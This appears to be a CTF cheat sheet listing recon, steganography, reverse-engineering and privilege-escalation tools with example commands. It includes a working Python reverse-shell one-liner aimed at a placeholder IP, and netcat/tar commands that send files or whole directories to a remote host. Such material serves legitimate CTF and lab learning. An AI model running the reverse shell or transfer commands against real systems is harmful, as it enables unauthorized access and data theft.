Collection of useful tools for CTFs.
- Web
- Crypto
- Steganography
- Binary/Reverse
- Other
- Useful
- [to update]
- nmap
Example usage : sudo nmap -sS -A -T4 <ip_target> -oN <name_output> -vv
- gobuster
Example usage for directory/file enumeration:
gobuster dir -u http://<ip_target> --wordlist <path_to_wordlist> -x <extensions>
where:
  * path_to_wordlist can be something like "/usr/share/wordlists/<wordlist>"
  * extensions is a comma-separated list without spaces, like php,txt,js,cgi,sh,...
- dirb
- curl
- nikto
Example usage: nikto -h <ip_target>
- wpscan
- wget
Example usage: wget <url>
- golismero
Example usage:
golismero scan -i /root/port80.xml -o sub1-port80.html
- Burp Suite
- steghide
Example usage: steghide <command> <options> <file>
where command can be:
  > info <file>                       -- shows whether the file carries embedded data (asks for the passphrase)
  > extract -sf <file> [-p <pass>]    -- extracts the hidden data (use -p "" to try an empty passphrase)
  > embed -cf <cover> -ef <secret>    -- hides <secret> inside <cover>
- Stegsolve
- exif
- exiftool
- binwalk
- aperisolve.fr
- checksec
- strings
- ltrace
- strace
- frida
- gdb / gdb-peda
- hexdump (the -C option, canonical hex + ASCII side by side, is very useful)
- objdump
- apktool
- Jadx -- Java decompiler
- Decompilers for jar, pyc, exe, class, ...
- Pwntools
- nc -- TCP/IP swiss army knife
- linpeas.sh -- for Linux Privesc
- sudo -l -- lists which commands the current user may run with sudo (and as which user); the first thing to check for privesc
- searchsploit -- search the local copy of the Exploit-DB archive
Example usage: searchsploit OpenSSH 7.2p2
searchsploit -p 46635 -- prints the local path and the exploit-db.com URL of the entry with that EDB-ID (46635 is an Exploit-DB ID, not a CVE number); use -m <EDB-ID> to copy the exploit into the current directory
- msfconsole -- the Metasploit Framework console, the go-to tool for exploitation
- sending a file using nc (start the listening side first; the transfer is over when the sending side closes the connection):
receiving side : nc -lvp <port> > <file>
sending side   : nc <ip_receiver> <port> < <file>
- sending a directory using nc + tar:
receiving side : nc -lvp <port> | tar xf -
sending side   : tar cf - . | nc <ip_receiver> <port>
- sending a file using nc + wget (nc answers the HTTP request with the raw file bytes, no headers):
sending side   : nc -lvp <port> < <file>
receiving side : wget http://<ip_sender>:<port>/<file>
!! [NOTE: the connection stays open after the whole file has been sent: nc does not close the socket when it reaches end of file on its input, and with no HTTP headers wget gets no Content-Length telling it the body is complete, so it keeps waiting. Once the byte count stops growing, press Ctrl+C on the nc side and voilà (or run nc with -q 0 or -N, depending on the netcat flavour, so it closes by itself). Compare sha256sum on both ends to make sure nothing was truncated.]
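The raw-stream transfer above, reimplemented in Python as an added example (this is not code from the page): the receiving side reads until EOF, which is exactly why the transfer only finishes when the sending side closes (or shuts down) its socket, and why a sha256 comparison on both ends is the right completeness check. Running both ends on 127.0.0.1 with an OS-picked port, the function names and the sample payload are assumptions constructed for the demo.

```python
import hashlib
import socket
import threading


def receive_file(listener):
    """Receiving side, equivalent of `nc -lvp <port> > <file>`:
    accept one connection and read until EOF (an empty recv)."""
    conn, _ = listener.accept()
    chunks = []
    with conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # EOF: the sender closed its end
                break
            chunks.append(chunk)
    return b"".join(chunks)


def send_file(host, port, data):
    """Sending side, equivalent of `nc <ip_receiver> <port> < <file>`:
    connect, stream the bytes, then shut down the write side so the
    receiver sees EOF (what `nc -N` / `nc -q 0` do after stdin EOF)."""
    with socket.create_connection((host, port)) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)


def sha256(data):
    """Same check you would run on both ends with `sha256sum <file>`."""
    return hashlib.sha256(data).hexdigest()


def transfer(data):
    """Run receiver and sender against each other on 127.0.0.1 (assumed
    for the demo) and return (received_bytes, digests_match)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # port 0: the OS picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    t = threading.Thread(target=lambda: result.update(data=receive_file(listener)))
    t.start()
    send_file("127.0.0.1", port, data)
    t.join(timeout=10)
    listener.close()

    received = result.get("data", b"")
    return received, sha256(received) == sha256(data)


if __name__ == "__main__":
    # constructed payload: a few hundred KB plus a marker line, standing in for a flag file
    payload = b"A" * 300_000 + b"\nflag{constructed_example}\n"
    got, ok = transfer(payload)
    print(f"received {len(got)} bytes, sha256 match: {ok}")
```

The `shutdown(SHUT_WR)` in `send_file` is the part plain `nc` skips by default: without it the receiver's `recv` never returns empty and both ends sit there, which is the stall the note above describes.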
- to convert a python script from v.2 to v.3 (lib2to3 is deprecated since Python 3.11 and removed in 3.13, so run it with an older Python 3):
python3 -m lib2to3 -w <script>.py
- connect to a POP3 server (port 110) using telnet:
telnet <ip> 110
- reverse shell in one line, using python3 (start a listener first on your machine, e.g. nc -lvp <port>; the payload binds stdin/stdout/stderr of /bin/sh to the socket):
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- run a simple HTTP server with python3 (serves the current directory, port 8000 if none is given):
python3 -m http.server [port]
- create a generic SSL/TLS client that connects to a remote server speaking SSL/TLS (for services that do not talk plaintext, where nc shows nothing useful).
Example: openssl s_client -connect <ip_address>:<port>
Once the handshake completes, paste the password and you're done.
- prepend data to a file (the pipeline writes <data> first, then <file>):
Example usage: printf "<data>" | cat - <file> > <file_out>
where data is something like "\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00", the 10-byte gzip header, to repair a compressed file whose magic bytes were stripped. The \x escapes need bash's printf; with a POSIX sh use octal escapes ("\037\213\010\000...") instead.
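The same prepend done in Python, as an added example that is not part of the page, applied to the case the gzip header is for: a compressed file whose magic bytes have been chopped off. The damaged sample is constructed inside the block and the function names are this example's own.

```python
import gzip

# The 10-byte gzip header from the printf line above:
# magic 1f 8b, method 08 (deflate), flags 00, mtime 00000000, xfl 00, os 00
GZIP_HEADER = b"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00"


def prepend(prefix, data):
    """Same effect as: printf "<prefix>" | cat - <file> > <file_out>"""
    return prefix + data


def has_gzip_magic(data):
    """True if the file still starts with the gzip magic bytes."""
    return data[:2] == b"\x1f\x8b"


def repair_and_decompress(data):
    """Put the header back only if the magic bytes are missing, then inflate.
    mtime/xfl/os in the prepended header are all zero; the decoder ignores
    them, and the CRC32/ISIZE trailer still verifies the payload."""
    if not has_gzip_magic(data):
        data = prepend(GZIP_HEADER, data)
    return gzip.decompress(data)


def make_headerless_sample():
    """Constructed sample: a compressed fake flag with its 10-byte header
    cut off, the shape of file this trick is meant to fix."""
    blob = gzip.compress(b"flag{constructed_example}", mtime=0)
    return blob[10:]


if __name__ == "__main__":
    damaged = make_headerless_sample()
    print("magic present:", has_gzip_magic(damaged))
    print(repair_and_decompress(damaged))
```

If `gzip.decompress` still fails after the header is back, the damage is somewhere else (a truncated trailer, or the file was never gzip); `binwalk` and `hexdump -C` on the first bytes will tell you which.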
- PEM Parser
- view and edit files in hexadecimal or in ASCII
hexedit [filename]
- Francesco Varotto - @frarotto
- Massimiliano Belluomini - @massibelluomini
- Filippo Giambartolomei - @filippogiamba